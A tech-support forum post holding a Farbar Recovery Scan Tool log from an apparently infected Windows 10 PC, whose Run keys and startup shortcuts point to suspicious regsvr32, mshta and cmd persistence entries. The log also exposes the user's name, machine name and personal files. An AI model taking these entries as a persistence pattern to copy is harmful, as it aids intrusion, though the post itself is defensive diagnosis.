Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

RegSvr31 Failure to Load error message [Solved]


  • This topic is locked This topic is locked

#16
rlives16

rlives16

    Member

  • Topic Starter
  • Member
  • PipPip
  • 34 posts
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 21-08-2016 01
Ran by Ryan (administrator) on DESKTOP-A6RCKOD (27-08-2016 04:08:33)
Running from C:\Users\Ryan\Downloads
Loaded Profiles: Ryan (Available Profiles: Ryan)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Autodesk, Inc.) C:\Program Files\Autodesk\Content Service\Connect.Service.ContentService.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\Live Update\MSI_LiveUpdate_Service.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Akamai Technologies, Inc.) C:\Users\Ryan\AppData\Local\Akamai\netsession_win.exe
(Akamai Technologies, Inc.) C:\Users\Ryan\AppData\Local\Akamai\netsession_win.exe
(Autodesk, Inc.) C:\Program Files (x86)\Common Files\Autodesk Shared\Autodesk Download Manager\DLMSession.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\McChHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.9.829.0\McCSPServiceHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2634872 2015-08-26] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [1710568 2015-08-26] (NVIDIA Corporation)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-07-26] (Apple Inc.)
HKLM-x32\...\Run: [ADSK DLMSession] => C:\Program Files (x86)\Common Files\Autodesk Shared\Autodesk Download Manager\DLMSession.exe [1627032 2015-01-28] (Autodesk, Inc.)
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2016-07-28] (Google Inc.)
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [Windows Performance Monitor] => C:\Users\Ryan\AppData\Local\Microsoft\Performance\Monitor\PerformanceMonitor.dll [3666432 2016-08-19] ()
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [AXworks] => regsvr32.exe C:\Users\Ryan\AppData\Local\AXworks\AtlInterval.dll <===== ATTENTION
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [Eltion] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Ryan\AppData\Local\Eqtion\CnxCcSupport.dll
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [BrowserUpdate] => C:\Users\Ryan\AppData\Roaming\BrowserMe\GoogleUpdate.exe [215356416 2016-08-21] (Google Inc.)
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [BrowserMe] => C:\Users\Ryan\AppData\Roaming\BrowserMe\GoogleUpdate.exe [215356416 2016-08-21] (Google Inc.)
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [**qterhqnqq<*>] => "C:\Users\Ryan\AppData\Local\751c12\230b29.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [Akamai NetSession Interface] => C:\Users\Ryan\AppData\Local\Akamai\netsession_win.exe [4691384 2015-09-10] (Akamai Technologies, Inc.)
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Policies\Explorer: [] 
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-07-29] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-07-29] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-07-29] (Google)
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2015-02-06] (Autodesk, Inc.)
Startup: C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\172bb1.lnk [2016-08-27]
ShortcutTarget: 172bb1.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\45f527.lnk [2016-08-27]
ShortcutTarget: 45f527.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{ba67ce16-dddb-4d21-842b-6879e276af9c}: [DhcpNameServer] 75.75.75.75 75.75.76.76
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-868973554-806322924-1075547668-1002\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-08-19] (Google Inc.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-08-19] (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-08-19] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-08-19] (Google Inc.)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-08-22] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-08-22] (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-08-22] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-08-22] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2016-07-07] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2016-07-07] (McAfee, Inc.)
 
FireFox:
========
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-07-07] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-12-18] ()
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-07-07] ()
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-08-25] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-08-25] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-17] (Google Inc.)
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2016-08-25]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR Profile: C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (SiteAdvisor) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2016-08-19]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-08-17]
CHR Extension: (Chrome Media Router) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-08-18]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 Autodesk Content Service; C:\Program Files\Autodesk\Content Service\Connect.Service.ContentService.exe [31160 2015-02-05] (Autodesk, Inc.)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1155192 2015-08-26] (NVIDIA Corporation)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [163592 2016-08-22] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [993824 2016-07-07] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.829.0\\McCSPServiceHost.exe [1910000 2016-05-31] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [816128 2016-06-21] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232688 2016-04-26] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-06-23] (McAfee, Inc.)
R3 mfevtp; C:\Windows\system32\mfevtps.exe [277744 2016-04-26] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1454216 2016-06-17] (McAfee, Inc.)
R2 MSI_LiveUpdate_Service; C:\Program Files (x86)\MSI\Live Update\MSI_LiveUpdate_Service.exe [2227152 2016-07-19] (Micro-Star INT'L CO., LTD.)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1872504 2015-08-26] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [5544568 2015-08-26] (NVIDIA Corporation)
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1045336 2016-05-25] (Intel Security, Inc.)
S3 vmicvss; C:\Windows\System32\ICSvc.dll [506880 2015-07-10] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24856 2016-08-03] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [78632 2016-04-27] (McAfee, Inc.)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2016-08-20] (Windows ® Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2016-08-20] (Windows ® Win 7 DDK provider)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207968 2016-02-24] (McAfee, Inc.)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [419616 2016-04-27] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [349480 2016-04-27] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83608 2016-04-27] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [493352 2016-04-27] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [843048 2016-04-27] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\system32\DRIVERS\mfencbdc.sys [519976 2016-04-27] (McAfee, Inc.)
S3 mfencrk; C:\Windows\system32\DRIVERS\mfencrk.sys [100136 2016-04-27] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [46240 2016-06-06] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [243488 2016-04-27] (McAfee, Inc.)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19576 2015-08-26] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [50472 2015-08-11] (NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek                                            )
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NAVENG; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160818.017\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160818.017\EX64.SYS [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-08-27 04:05 - 2016-08-27 04:05 - 00016148 _____ C:\Windows\system32\DESKTOP-A6RCKOD_Ryan_HistoryPrediction.bin
2016-08-27 03:58 - 2016-08-27 04:03 - 00000000 ____D C:\AdwCleaner
2016-08-27 03:58 - 2016-08-27 03:58 - 03826240 _____ C:\Users\Ryan\Downloads\AdwCleaner.exe
2016-08-27 03:57 - 2016-08-27 03:57 - 00000775 _____ C:\Users\Ryan\Desktop\JRT.txt
2016-08-27 03:56 - 2016-08-27 03:56 - 01610560 _____ (Malwarebytes) C:\Users\Ryan\Downloads\JRT (2).exe
2016-08-27 03:54 - 2016-08-27 03:54 - 01610560 _____ (Malwarebytes) C:\Users\Ryan\Downloads\JRT (1).exe
2016-08-27 03:50 - 2016-08-27 03:50 - 01610560 _____ (Malwarebytes) C:\Users\Ryan\Downloads\JRT.exe
2016-08-27 03:50 - 2016-08-27 03:50 - 00004020 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse
2016-08-27 03:49 - 2016-08-27 03:49 - 00001252 _____ C:\Users\Ryan\Desktop\fixlist.txt
2016-08-26 22:42 - 2016-08-26 22:44 - 00031480 _____ C:\Users\Ryan\Downloads\Addition.txt
2016-08-26 22:41 - 2016-08-27 04:08 - 00017721 _____ C:\Users\Ryan\Downloads\FRST.txt
2016-08-26 22:26 - 2016-08-26 22:28 - 81999431 _____ C:\Users\Ryan\Downloads\youblisher.com-803348-The_Making_of_the_West_Peoples_and_Cultures.pdf
2016-08-26 22:01 - 2016-08-26 22:01 - 00341908 _____ C:\Users\Ryan\Desktop\Biology 160 BioLit Session syllabus_Fall2016_810.pdf
2016-08-26 21:31 - 2016-08-26 21:31 - 00000231 _____ C:\Users\Ryan\Desktop\ckfiles.txt
2016-08-26 21:20 - 2016-08-26 21:20 - 00468480 _____ () C:\Users\Ryan\Downloads\CKScanner.exe
2016-08-26 18:19 - 2016-08-26 18:20 - 00032565 _____ C:\Users\Ryan\Desktop\Addition.txt
2016-08-26 18:18 - 2016-08-26 18:20 - 00162909 _____ C:\Users\Ryan\Desktop\FRST.txt
2016-08-26 18:17 - 2016-08-27 04:08 - 00000000 ____D C:\FRST
2016-08-26 18:16 - 2016-08-26 18:17 - 02396160 _____ (Farbar) C:\Users\Ryan\Downloads\FRST64.exe
2016-08-26 12:15 - 2016-08-26 12:15 - 00187661 ____T C:\Users\Ryan\Desktop\AppStTicket.pdf
2016-08-26 01:46 - 2016-08-26 01:46 - 06888589 _____ C:\Users\Ryan\Desktop\Fundamental of Diff. Eqn.(8.Edition).pdf
2016-08-25 00:47 - 2016-08-25 00:47 - 00013135 _____ C:\Users\Ryan\Desktop\RaceToDNAhw_RML.docx.xlsx
2016-08-24 20:52 - 2016-08-26 13:27 - 00004208 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse
2016-08-23 23:40 - 2016-08-23 23:40 - 00165547 _____ C:\Users\Ryan\Desktop\ScheduleFall16.pdf
2016-08-23 18:01 - 2016-08-23 18:01 - 01989011 _____ C:\Users\Ryan\Downloads\EStatement-2016-08-16-64897.pdf
2016-08-23 13:02 - 2016-08-23 13:02 - 00049672 _____ C:\Users\Ryan\AppData\Local\fbbwudfn.jy
2016-08-23 13:02 - 2016-08-23 13:02 - 00012228 _____ C:\Users\Ryan\AppData\Local\gchbgoka
2016-08-22 20:46 - 2016-08-22 20:46 - 00003338 _____ C:\Windows\System32\Tasks\OneDrive Standalone Update Task
2016-08-22 20:46 - 2016-08-22 20:46 - 00000000 ____D C:\Users\Ryan\AppData\Roaming\Skype
2016-08-22 17:14 - 2016-08-23 22:30 - 00000000 ____D C:\Users\Ryan\AppData\LocalLow\BitTorrent
2016-08-21 17:19 - 2016-08-21 17:19 - 00049672 _____ C:\Users\Ryan\AppData\Roaming\opoweeai.drh
2016-08-21 17:19 - 2016-08-21 17:19 - 00009994 _____ C:\Users\Ryan\AppData\Roaming\rowgleru
2016-08-21 14:54 - 2016-08-21 14:54 - 00000000 ____D C:\Users\Default\AppData\Local\Microsoft Help
2016-08-21 14:54 - 2016-08-21 14:54 - 00000000 ____D C:\Users\Default User\AppData\Local\Microsoft Help
2016-08-21 14:41 - 2016-08-21 14:41 - 00002048 _____ C:\Users\Ryan\Desktop\Revit 2016.lnk
2016-08-20 20:45 - 2016-08-21 20:32 - 00125408 _____ C:\Users\Ryan\AppData\Local\GDIPFONTCACHEV1.DAT
2016-08-20 20:44 - 2016-08-21 13:19 - 00000000 ____D C:\ProgramData\RevitInterProcess
2016-08-20 20:43 - 2016-08-20 20:43 - 00000000 ____D C:\ProgramData\boost_interprocess
2016-08-20 20:32 - 2016-08-20 20:32 - 00201878 _____ C:\Users\Ryan\Desktop\Hist242FA16.pdf
2016-08-20 19:15 - 2016-08-20 19:15 - 03867040 _____ C:\Windows\system32\PortChanger.exe
2016-08-20 19:15 - 2016-08-20 19:15 - 02398112 _____ (Hewlett Packard) C:\Windows\system32\hppldcoi.dll
2016-08-20 19:15 - 2016-08-20 19:15 - 00151968 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\Drivers\Dot4.sys
2016-08-20 19:15 - 2016-08-20 19:15 - 00049056 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Dot4usb.sys
2016-08-20 19:15 - 2016-08-20 19:15 - 00027040 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\Drivers\Dot4Prt.sys
2016-08-20 19:15 - 2016-08-20 19:15 - 00000000 ____D C:\Windows\LastGood.Tmp
2016-08-20 19:14 - 2016-08-20 19:14 - 00053248 _____ (Hewlett-Packard Corporation) C:\Windows\system32\hpzllw71.dll
2016-08-20 19:14 - 2016-08-20 19:14 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2016-08-20 19:09 - 2016-08-20 19:09 - 01304576 _____ (Hewlett-Packard) C:\Windows\system32\hpowiav1.dll
2016-08-20 19:09 - 2016-08-20 19:09 - 00736256 _____ (Hewlett-Packard Co.) C:\Windows\system32\hpotscl1.dll
2016-08-20 18:54 - 2016-08-21 13:25 - 00000028 _____ C:\Windows\ODBC.INI
2016-08-20 18:54 - 2016-08-21 13:25 - 00000023 _____ C:\Windows\ODBCINST.INI
2016-08-20 18:34 - 2016-08-20 18:34 - 00010053 _____ C:\Users\Ryan\Desktop\PracticeMapQuiz.xlsx
2016-08-20 18:33 - 2016-08-20 18:33 - 00000000 ____D C:\Users\Ryan\Documents\Custom Office Templates
2016-08-20 18:12 - 2016-08-20 18:12 - 00536974 _____ C:\Users\Ryan\Desktop\practicemapquiz.jpeg
2016-08-20 17:56 - 2016-08-20 17:56 - 00898025 _____ C:\Users\Ryan\Desktop\shotrecords.pdf
2016-08-20 17:21 - 2016-08-20 17:22 - 00000000 ____D C:\Users\Ryan\Desktop\AutoCAD Templates
2016-08-20 16:38 - 2016-08-20 16:39 - 00000000 ____D C:\ProgramData\FLEXnet
2016-08-20 16:37 - 2016-08-20 16:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MSI
2016-08-20 16:37 - 2016-08-20 16:37 - 00000000 ____D C:\Program Files (x86)\MSI
2016-08-20 13:00 - 2016-08-20 13:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk ReCap 2016
2016-08-20 13:00 - 2016-08-20 13:00 - 00000000 ____D C:\ProgramData\FARO
2016-08-20 12:53 - 2016-08-20 12:53 - 00002171 _____ C:\Users\Public\Desktop\AutoCAD 2016 - English.lnk
2016-08-20 12:53 - 2016-08-20 12:53 - 00000000 ____D C:\Program Files (x86)\Autodesk
2016-08-20 12:52 - 2016-08-20 12:52 - 00000000 ____D C:\Users\Public\Documents\Autodesk
2016-08-20 12:52 - 2016-08-20 12:52 - 00000000 ____D C:\Program Files\Common Files\Macrovision Shared
2016-08-20 12:51 - 2016-08-20 12:51 - 00000000 ____D C:\Users\Ryan\Documents\Inventor Server SDK ACAD 2016
2016-08-20 12:50 - 2016-08-20 12:50 - 00000133 _____ C:\ProgramData\Microsoft.SqlServer.Compact.351.64.bc
2016-08-20 12:43 - 2016-08-20 12:43 - 00000000 ____D C:\Program Files\Reference Assemblies
2016-08-20 12:43 - 2016-08-20 12:43 - 00000000 ____D C:\Program Files\MSBuild
2016-08-20 12:43 - 2016-08-20 12:43 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2016-08-20 12:43 - 2016-08-20 12:43 - 00000000 ____D C:\Program Files (x86)\MSBuild
2016-08-20 12:42 - 2015-06-17 18:10 - 01166520 _____ (Microsoft Corporation) C:\Windows\system32\PresentationNative_v0300.dll
2016-08-20 12:42 - 2015-06-17 18:10 - 00124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2016-08-20 12:42 - 2015-06-17 18:10 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2016-08-20 12:42 - 2015-05-29 21:07 - 00778936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationNative_v0300.dll
2016-08-20 12:42 - 2015-05-29 21:07 - 00102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2016-08-20 12:42 - 2015-05-29 21:07 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2016-08-20 12:38 - 2016-08-21 14:42 - 00000000 ____D C:\Program Files\Autodesk
